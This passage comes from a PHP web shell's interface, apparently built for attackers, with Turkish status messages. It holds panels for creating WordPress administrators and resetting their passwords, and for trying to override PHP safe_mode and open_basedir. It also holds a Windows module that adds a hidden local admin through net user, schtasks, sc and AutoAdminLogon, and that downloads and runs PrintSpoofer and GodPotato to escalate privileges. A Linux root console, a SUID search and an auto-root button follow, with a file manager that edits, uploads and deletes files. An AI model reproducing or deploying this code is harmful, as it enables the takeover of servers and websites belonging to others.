?>" value="yesim<?= rand(100,999) ?>!" placeholder="Pass"> <input type="text" id="add_email_<?= $dir_id ?>" value="wp_<?= rand(1,99) ?>@root.com" placeholder="Email"> <button class="btn" onclick="addAdmin('<?= addslashes($wp_dir) ?>', '<?= $dir_id ?>', this)">CREATE</button> </div> </div> <?php if (!$mysqli->connect_errno): $users = wp_fetch_users($mysqli, $cfg['prefix']); $site_url = get_site_url($mysqli, $cfg['prefix']); ?> <table class="data-table"> <thead> <tr><th>ID</th><th>User</th><th>Role</th><th>Reset</th><th>Action</th></tr> </thead> <tbody> <?php foreach($users as $u): ?> <tr> <td><?= $u['ID'] ?></td> <td><b class="text-primary"><?= htmlspecialchars($u['user_login']) ?></b></td> <td><span style="background: rgba(0,255,136,0.1); color: var(--accent); padding: 2px 6px; border-radius: 4px; font-size: 10px;"><?= $u['role'] ?></span></td> <td> <div style="display: flex; gap: 5px;"> <input type="text" id="p_<?= $u['ID'] ?>_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" style="width: 100px; padding: 4px 8px; font-size: 11px;"> <button class="btn btn-sm btn-primary" onclick="resetPassword('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, 'p_<?= $u['ID'] ?>_<?= $dir_id ?>', this)">SET</button> </div> </td> <td> <div style="display: flex; gap: 8px;"> <a href="<?= htmlspecialchars($site_url) ?>/wp-login.php?log=<?= urlencode($u['user_login']) ?>" target="_blank" class="btn btn-sm"><i class="fas fa-sign-in-alt"></i></a> <button class="btn btn-sm" style="color: var(--primary);" onclick="deleteUser('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>)"><i class="fas fa-trash"></i></button> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; @$mysqli->close(); ?> </div> <?php endforeach; ?> <?php elseif(isset($_GET['bypasses'])): ?> <div class="title-section"> <h1>SECURITY <span>BYPASSES</span></h1> <p style="color: var(--text-dim);">Advanced Environment Escape Modules</p> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 1. PHP.INI / Disable Functions Override</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Trying to override restricted environment settings using available methods.</p> <div style="background: rgba(0,0,0,0.3); padding: 15px; border-radius: 8px; border: 1px solid var(--border);"> <div style="margin-bottom: 10px;">Method: <b>ini_set / ini_restore Evasion</b></div> <?php @ini_set('safe_mode', '0'); @ini_set('open_basedir', 'none'); echo "Safe Mode Attempt: " . (@ini_get('safe_mode') ? '<span class="status-off">STILL ON</span>' : '<span class="status-on">BYPASSED / OFF</span>') . "<br>"; echo "Open Basedir Attempt: " . (@ini_get('open_basedir') ? '<span class="text-primary">' . @ini_get('open_basedir') . '</span>' : '<span class="status-on">NONE / BYPASSED</span>'); ?> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> 2. Execution Method Scanner</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Scanning for active command execution primitives.</p> <div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;"> <?php $primitives = ['system','shell_exec','passthru','exec','popen','proc_open','pcntl_exec','python_eval']; foreach($primitives as $p) { $status = function_exists($p) ? '<span class="status-on">ACTIVE</span>' : '<span class="status-off">DISABLED</span>'; echo "<div style='background:rgba(255,255,255,0.03); padding: 10px; border-radius: 6px;'><b>$p:</b> $status</div>"; } ?> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-user-secret text-primary"></i> 3. Stealth Loader (LD_PRELOAD placeholder)</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Advanced bypass using shared object injection.</p> <button class="btn" onclick="alert('Module planned: SO injection for disable_functions bypass.')">DEPLOY MODULE</button> </div> <?php elseif(isset($_GET['settings'])): ?> <div class="title-section"> <h1>SHELL <span>SETTINGS</span></h1> <p style="color: var(--text-dim);">Configuration and Access Control</p> </div> <div class="card" style="max-width: 600px;"> <h3 style="margin-bottom: 25px;"><i class="fas fa-lock text-primary"></i> Access Protection</h3> <form id="settings-form"> <div style="margin-bottom: 20px;"> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">LOGIN PROTECTION</label> <select id="login_enable" name="login_enable" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px; width: 100%;"> <option value="1" <?= $pagePasswordEnable === '1' ? 'selected' : '' ?>>ENABLED</option> <option value="0" <?= $pagePasswordEnable === '0' ? 'selected' : '' ?>>DISABLED (OPEN)</option> </select> </div> <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;"> <div> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">USERNAME</label> <input type="text" id="login_user" value="<?= htmlspecialchars($username) ?>"> </div> <div> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">PASSWORD</label> <input type="text" id="login_pass" value="<?= htmlspecialchars($password) ?>"> </div> </div> <button type="button" class="btn btn-primary" style="width: 100%; justify-content: center;" onclick="saveSettings()"> <i class="fas fa-save"></i> SAVE CONFIGURATION </button> </form> </div> <script> function saveSettings() { const enable = document.getElementById('login_enable').value; const user = document.getElementById('login_user').value; const pass = document.getElementById('login_pass').value; const fd = new FormData(); fd.append('save_settings', '1'); fd.append('login_enable', enable); fd.append('login_user', user); fd.append('login_pass', pass); fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> <?php elseif(isset($_GET['winr00t'])): ?> <div class="title-section"> <h1>WINDOWS <span>ROOT</span></h1> <p style="color: var(--text-dim);">Ultra Admin Creator Bypass (Windows/2025)</p> </div> <div class="card"> <form method="post"> <div style="display: flex; gap: 10px; align-items: center; flex-wrap: wrap; margin-bottom: 20px;"> <div style="flex: 1; min-width: 200px;"> <label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN USERNAME</label> <input type="text" name="win_user" value="<?= htmlspecialchars($_POST['win_user'] ?? 'root_adm') ?>"> </div> <div style="flex: 1; min-width: 200px;"> <label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN PASSWORD</label> <?php $rand_pw = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 12); ?> <input type="text" name="win_pass" value="<?= htmlspecialchars($_POST['win_pass'] ?? $rand_pw) ?>"> </div> <button type="submit" name="do_winroot" class="btn btn-primary" style="margin-top: 18px;"> <i class="fas fa-user-plus"></i> INJECT ADMIN </button> </div> </form> <?php function detect_rdp_port() { $reg = root_exec('reg query "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber 2>&1'); if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) return hexdec($m[1]); $netstat = root_exec('netstat -an | find ":3389"'); if (strpos($netstat, '3389') !== false) return 3389; return 'Unknown'; } $rdp_port = detect_rdp_port(); echo "<div style='margin-bottom: 15px; font-weight: 600;'>RDP Port: <span class='text-accent'>$rdp_port</span></div>"; if (isset($_POST['do_winroot'])) { $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['win_user']); $p = $_POST['win_pass']; echo '<pre style="background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto; border: 1px solid #333;">'; function wout($msg) { echo htmlspecialchars($msg)."\n"; ob_flush(); flush(); } function prvd_exec_with_timeout($cmd, $timeout = 10) { $cmd_esc = str_replace('"', '\"', $cmd); // Using -WorkingDirectory and better error suppression to handle permission/path issues $ps = "powershell -Command \"\$p = Start-Process -FilePath 'cmd.exe' -ArgumentList '/c $cmd_esc' -NoNewWindow -PassThru -WorkingDirectory 'C:\\Windows\\Temp'; if (\$p) { \$p | Wait-Process -Timeout $timeout; if(-not \$p.HasExited){\$p.Kill()} }\""; $out = root_exec($ps.' 2>&1'); if (trim($out) && stripos($out, 'invalid') === false && stripos($out, 'error') === false) return $out; // Fallback to direct execution if PowerShell timed out or failed return root_exec($cmd.' 2>&1'); } $methods = [ ["[*] net user (classic)", "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"], ["[*] PowerShell (background)", "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""], ["[*] schtasks", "schtasks /create /tn root_task /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"], ["[*] sc service exploit", "sc create r00tsvc rootPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"], ["[*] Registry AutoAdminLogon", "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"], ["[*] Fallback CMD", "cmd /c net user $u $p /add & net localgroup Administrators $u /add"], ["[*] PowerShell Script Chain", "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""], ["[*] SeImpersonate (Potato/PrintSpoofer Check)", "whoami /priv | findstr /i SeImpersonatePrivilege"] ]; $success = false; foreach ($methods as $index => $step) { list($label, $cmd) = $step; wout($label . "..."); // Advanced handling for SeImpersonatePrivilege if (strpos($label, "SeImpersonate") !== false) { $priv_check = root_exec($cmd); if (stripos($priv_check, "enabled") !== false || stripos($priv_check, "disabled") !== false) { wout("[!] SeImpersonatePrivilege Bulundu! Patlama Yakın..."); // Verification function $check_user = function($uname) { $check = root_exec("net user $uname 2>&1"); return (stripos($check, "User name") !== false && stripos($check, "The command completed successfully") === false) || stripos($check, "Local Group Memberships") !== false; }; // 1. Try PrintSpoofer wout("[*] PrintSpoofer exploit deneniyor..."); $ps_url = "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe"; $ps_path = "C:\\Windows\\Temp\\ps_" . rand(100,999) . ".exe"; if (root_smart_download($ps_url, $ps_path)) { $exp_cmd = "$ps_path -c \"cmd /c net user $u $p /add && net localgroup Administrators $u /add\""; root_exec($exp_cmd . " 2>&1"); @unlink($ps_path); if ($check_user($u)) { wout("[+] PrintSpoofer BAŞARILI!"); $success = true; break; } } // 2. Try GodPotato (Fallback) if (!$success) { wout("[*] GodPotato exploit deneniyor..."); $gp_url = "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe"; $gp_path = "C:\\Windows\\Temp\\gp_" . rand(100,999) . ".exe"; if (root_smart_download($gp_url, $gp_path)) { $exp_cmd = "$gp_path -cmd \"cmd /c net user $u $p /add && net localgroup Administrators $u /add\""; root_exec($exp_cmd . " 2>&1"); @unlink($gp_path); if ($check_user($u)) { wout("[+] GodPotato BAŞARILI!"); $success = true; break; } } } if (!$success) wout("[!] SeImpersonate exploitleri başarısız oldu."); } } $res = prvd_exec_with_timeout($cmd, 5); wout($res); if (stripos($res, 'success') !== false || stripos($res, 'ok') !== false || stripos($res, 'already exists') !== false || stripos($res, 'successfully') !== false) { wout("[+] Admin user injected!"); $success = true; break; } } if ($success) { $_SESSION['winroot_success'] = true; $_SESSION['winroot_u'] = $u; $_SESSION['winroot_p'] = $p; wout("\n[+] 0wn3d! Admin user created:\n[+] User: $u\n[+] Pass: $p"); } else { wout("\n[!] Root failed :: No vector worked."); } echo '</pre>'; } if ($_SESSION['winroot_success']): $u = $_SESSION['winroot_u']; $p = $_SESSION['winroot_p']; ?> <div class="card" style="border: 1px solid var(--primary); background: rgba(255, 62, 62, 0.05); margin-top: 20px;"> <h4 style="margin-bottom: 15px;"><i class="fas fa-bolt text-primary"></i> Run Commands as Admin</h4> <form method="post"> <input type="hidden" name="adm_u" value="<?= htmlspecialchars($u) ?>"> <input type="hidden" name="adm_p" value="<?= htmlspecialchars($p) ?>"> <div style="display: flex; gap: 10px;"> <input type="text" name="adm_cmd" value="<?= htmlspecialchars($_POST['adm_cmd'] ?? 'whoami /all') ?>" placeholder="Enter command..."> <button type="submit" name="run_as_adm" class="btn btn-primary">EXECUTE</button> </div> </form> <?php if (isset($_POST['run_as_adm'])): $cmd = $_POST['adm_cmd']; $cmdfile = "C:\\Windows\\Temp\\out_" . rand(1000, 9999) . ".txt"; wout("[*] Executing: $cmd"); // Try schtasks method $scht = "schtasks /create /tn root_admtask /tr \"cmd.exe /c $cmd > $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\""; root_exec($scht.' 2>&1'); root_exec("schtasks /run /tn root_admtask 2>&1"); sleep(1); $output = @file_get_contents($cmdfile); if(!$output) { // Fallback PowerShell $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$cmd.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"'; root_exec($pw.' 2>&1'); sleep(1); $output = @file_get_contents($cmdfile); } echo '<pre style="margin-top: 15px; color: var(--accent);">' . ($output ?: 'No output or execution failed.') . '</pre>'; @unlink($cmdfile); @root_exec('schtasks /delete /tn root_admtask /f 2>&1'); endif; ?> </div> <?php endif; ?> </div> <?php elseif(isset($_GET['linr00t'])): ?> <div class="title-section"> <h1>LINUX <span>ROOT</span></h1> <p style="color: var(--text-dim);">Kernel Privilege Escalation & System Analysis</p> </div> <div style="display: grid; grid-template-columns: 1fr 350px; gap: 25px;"> <div class="left-col"> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-search text-primary"></i> System Diagnostics</h3> <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px;"> <div class="info-item"><span class="info-label">Kernel:</span> <span class="info-value"><?= root_exec('uname -r') ?></span></div> <div class="info-item"><span class="info-label">Architecture:</span> <span class="info-value"><?= root_exec('uname -m') ?></span></div> <div class="info-item"><span class="info-label">Distribution:</span> <span class="info-value"><?= root_exec('cat /etc/issue | head -n 1') ?></span></div> <div class="info-item"><span class="info-label">GLIBC:</span> <span class="info-value"><?= root_exec('ldd --version | head -n 1') ?></span></div> <div class="info-item"><span class="info-label">Uptime:</span> <span class="info-value"><?= root_exec('uptime -p') ?></span></div> <div class="info-item"><span class="info-label">Current User:</span> <span class="info-value text-accent"><?= root_exec('id') ?></span></div> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> Root Console</h3> <form method="post"> <div style="display: flex; gap: 10px;"> <input type="text" name="lin_cmd" value="<?= htmlspecialchars($_POST['lin_cmd'] ?? 'id; whoami') ?>" placeholder="Enter command to run as root..."> <button type="submit" name="run_lin_cmd" class="btn btn-primary">EXECUTE</button> </div> </form> <?php if (isset($_POST['run_lin_cmd'])): ?> <pre style="margin-top: 15px; background: #000; color: #0f0; padding: 15px; border-radius: 8px; font-family: monospace; border: 1px solid #333;"><?= htmlspecialchars(root_exec($_POST['lin_cmd'])) ?></pre> <?php endif; ?> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-shield-alt text-primary"></i> SUID Binary Search</h3> <p style="font-size: 12px; color: var(--text-dim); margin-bottom: 15px;">Scanning for binaries with the SUID bit set (potential escalation vectors).</p> <pre style="max-height: 200px; overflow: auto; font-size: 11px; background: rgba(0,0,0,0.2); padding: 10px;"><?= root_exec('find /usr/bin /usr/sbin -perm -4000 -size -2M 2>/dev/null | head -n 15') ?></pre> </div> </div> <div class="right-col"> <div class="card" style="height: 100%;"> <h3 style="margin-bottom: 20px;"><i class="fas fa-history text-primary"></i> Exploit Log</h3> <div id="log-container" style="background: #000; height: 400px; padding: 15px; border-radius: 8px; font-family: 'JetBrains Mono', monospace; font-size: 11px; overflow-y: auto; color: #aaa; border: 1px solid #333;"> <?php if (isset($_SESSION['root_log'])) { foreach ($_SESSION['root_log'] as $log) { echo "<div>" . htmlspecialchars($log) . "</div>"; } } else { echo "<div class='text-dim'>Standing by for operations...</div>"; } ?> </div> <div style="margin-top: 20px;"> <form method="post"> <input type="hidden" name="action" value="auto_root"> <button type="submit" class="btn btn-primary" style="width: 100%; justify-content: center;"> <i class="fas fa-bolt"></i> RUN AUTO-ROOT </button> </form> <button class="btn" style="width: 100%; margin-top: 10px; justify-content: center;" onclick="window.location.href='?linr00t&clear_log=1'"> <i class="fas fa-trash-alt"></i> CLEAR LOG </button> </div> </div> </div> </div> <?php if (isset($_GET['clear_log'])) { $_SESSION['root_log'] = []; header("Location: ?linr00t"); exit; } ?> <?php elseif(isset($_GET['scan'])): ?> <div class="title-section"> <h1>BACKDOOR <span>SCANNER</span></h1> <p style="color: var(--text-dim);">Advanced Heuristic & Pattern Based Analysis</p> </div> <div class="card"> <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px;"> <div> <h3 style="margin-bottom: 5px;"><i class="fas fa-shield-alt text-primary"></i> System Integrity Check</h3> <?php $scan_base = root_find_scan_base(); ?> <p style="font-size: 13px; color: var(--text-dim);">Auto-Detected Root: <span class="text-accent"><?= htmlspecialchars($scan_base) ?></span></p> </div> <button class="btn btn-primary" onclick="window.location.href='?scan&do_scan=1'"> <i class="fas fa-play"></i> START FULL SCAN </button> </div> <?php if (isset($_GET['do_scan'])): ?> <?php $results = []; $scan_base = root_find_scan_base(); root_scanner_scan($scan_base, $results); usort($results, function($a, $b) { return $b['score'] - $a['score']; }); ?> <div style="margin-bottom: 20px;"> <span class="badge-system">FILES CHECKED: UNLIMITED</span> <span class="badge-system" style="margin-left: 10px;">THREATS FOUND: <?= count($results) ?></span> </div> <table class="data-table"> <thead> <tr><th>Danger</th><th>File Path</th><th>Detected Patterns</th><th>Size</th><th>Action</th></tr> </thead> <tbody> <?php foreach($results as $r): $color = $r['score'] >= 50 ? 'var(--primary)' : ($r['score'] >= 30 ? 'orange' : 'var(--accent)'); ?> <tr> <td> <div style="display: flex; align-items: center; gap: 8px;"> <div style="width: 10px; height: 10px; border-radius: 50%; background: <?= $color ?>; box-shadow: 0 0 10px <?= $color ?>;"></div> <b style="color: <?= $color ?>;"><?= $r['score'] ?>%</b> </div> </td> <td><span style="font-size: 11px; word-break: break-all;"><?= htmlspecialchars($r['path']) ?></span></td> <td> <div style="display: flex; flex-wrap: wrap; gap: 4px;"> <?php foreach($r['matches'] as $m): ?> <span style="background: rgba(255,255,255,0.05); padding: 2px 5px; border-radius: 3px; font-size: 9px;"><?= htmlspecialchars($m) ?></span> <?php endforeach; ?> </div> </td> <td style="font-size: 11px;"><?= formatSizeUnits($r['size']) ?></td> <td> <a href="?p=<?= encodePath(dirname($r['path'])) ?>&e=<?= urlencode(basename($r['path'])) ?>" class="btn btn-sm"><i class="fas fa-code"></i> Edit</a> </td> </tr> <?php endforeach; if(empty($results)): ?> <tr><td colspan="5" style="text-align: center; padding: 50px; color: var(--text-dim);">No suspicious files found in this directory.</td></tr> <?php endif; ?> </tbody> </table> <?php else: ?> <div style="text-align: center; padding: 60px; border: 2px dashed var(--border); border-radius: 12px;"> <i class="fas fa-search-plus" style="font-size: 3rem; color: var(--border); margin-bottom: 20px; display: block;"></i> <h4 style="color: var(--text-dim);">Click the button above to start a deep recursive scan.</h4> <p style="font-size: 12px; color: rgba(255,255,255,0.2); margin-top: 10px;">The scanner looks for eval, exec, base64, and other shell-like patterns used in backdoors.</p> </div> <?php endif; ?> </div> <?php elseif(isset($_GET['e'])): ?> <div class="title-section"> <h1>FILE <span>EDITOR</span></h1> <a href="?p=<?= encodePath(PATH) ?>" class="btn">BACK</a> </div> <div class="card"> <form method="post"> <h3 style="margin-bottom: 15px;"><?= htmlspecialchars($_GET['e']) ?></h3> <textarea name="content" style="height: 500px; font-family: 'JetBrains Mono', monospace; background: #000; border: 1px solid #333; font-size: 12px; line-height: 1.6; color: #00ff00;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $_GET['e'])) ?></textarea> <div style="margin-top: 20px; text-align: right;"> <button type="submit" name="edit" class="btn"><i class="fas fa-save"></i> SAVE FILE</button> </div> </form> </div> <?php elseif(isset($_GET['r'])): ?> <div class="card" style="max-width: 500px; margin: 100px auto;"> <h2 style="margin-bottom: 20px;">RENAME ITEM</h2> <form method="post"> <input type="text" name="new_name" value="<?= htmlspecialchars($_GET['r']) ?>" autofocus> <div style="margin-top: 20px; display: flex; gap: 10px;"> <button type="submit" name="rename" class="btn btn-primary" style="flex: 1;">RENAME</button> <a href="?p=<?= encodePath(PATH) ?>" class="btn" style="flex: 1;">CANCEL</a> </div> </form> </div> <?php else: ?> <div class="title-section"> <h1>FILE <span>MANAGER</span></h1> <div style="display: flex; gap: 10px;"> <button class="btn" onclick="toggle('create-panel')"><i class="fas fa-plus-circle"></i> NEW ENTRY</button> <button class="btn btn-primary" onclick="toggle('upload-box')"><i class="fas fa-cloud-upload-alt"></i> Upload</button> </div> </div> <div id="create-panel" class="card hidden animate__animated animate__fadeInDown"> <h3 style="margin-bottom: 15px;"><i class="fas fa-plus-circle text-primary"></i> Create New Item</h3> <div style="display: grid; grid-template-columns: 1fr 150px; gap: 10px; margin-bottom: 15px;"> <input type="text" id="new_item_name" placeholder="Name (e.g. index.php or /assets)"> <select id="new_item_type" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px;"> <option value="file">FILE</option> <option value="folder">FOLDER</option> </select> </div> <textarea id="new_item_content" style="height: 150px; margin-bottom: 15px;" placeholder="Initial content for the file..."></textarea> <div style="display: flex; gap: 10px; justify-content: flex-end;"> <button class="btn" onclick="toggle('create-panel')">CANCEL</button> <button class="btn btn-primary" onclick="submitCreate()">CREATE NOW</button> </div> <script> function submitCreate() { const name = document.getElementById('new_item_name').value; const type = document.getElementById('new_item_type').value; const content = document.getElementById('new_item_content').value; if(!name) return alert('Name required'); const fd = new FormData(); fd.append('fm_action', type === 'file' ? 'create_file' : 'create_folder'); fd.append('name', name); if(type === 'file') fd.append('content', content); fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> </div> <div class="breadcrumb"> <i class="fas fa-folder-open text-primary"></i> <?php $parts = explode(DIRECTORY_SEPARATOR, PATH); $built = ''; foreach($parts as $id => $part): if($part === '') continue; $built .= ($id == 0 ? '' : DIRECTORY_SEPARATOR) . $part; echo "/ <a href='?p=".encodePath($built)."'>".htmlspecialchars($part)."</a> "; endforeach; ?> </div> <div id="upload-box" class="card hidden animate__animated animate__fadeInDown"> <form method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" style="margin-bottom: 20px;"> <button type="submit" name="upload" class="btn btn-primary">START UPLOAD</button> </form> </div> <div class="card" style="padding: 0; overflow: hidden;"> <table class="data-table"> <thead> <tr><th>Name</th><th>Size</th><th>Date</th><th>Perms</th><th>Actions</th></tr> </thead> <tbody> <?php $items = scandir(PATH); $dirs = []; $fs = []; foreach($items as $i) { if($i=='.'||$i=='..') continue; if(is_dir(PATH.DIRECTORY_SEPARATOR.$i)) $dirs[]=$i; else $fs[]=$i; } foreach($dirs as $d): $p = PATH.DIRECTORY_SEPARATOR.$d; ?> <tr> <td><a href="?p=<?= encodePath($p) ?>" style="text-decoration:none; color:inherit; font-weight:bold;"><i class="fas fa-folder text-primary"></i> <?= htmlspecialchars($d) ?></a></td> <td class="text-dim">--</td> <td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td> <td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td> <td style="text-align: right;"> <a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($d) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a> <a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($d) ?>" class="btn btn-sm" style="color: var(--primary);" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a> </td> </tr> <?php endforeach; ?> <?php foreach($fs as $f): $p = PATH.DIRECTORY_SEPARATOR.$f; ?> <tr> <td><?= fileIcon($f) ?> <?= htmlspecialchars($f) ?></td> <td style="font-size: 11px;"><?= formatSizeUnits(filesize($p)) ?></td> <td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td> <td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td> <td style="text-align: right;"> <a href="?q=<?= encodePath(PATH) ?>&e=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-code"></i></a> <a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a> <a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($f) ?>" class="btn btn-sm" style="color: var(--primary);" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </main> </div> </body> </html>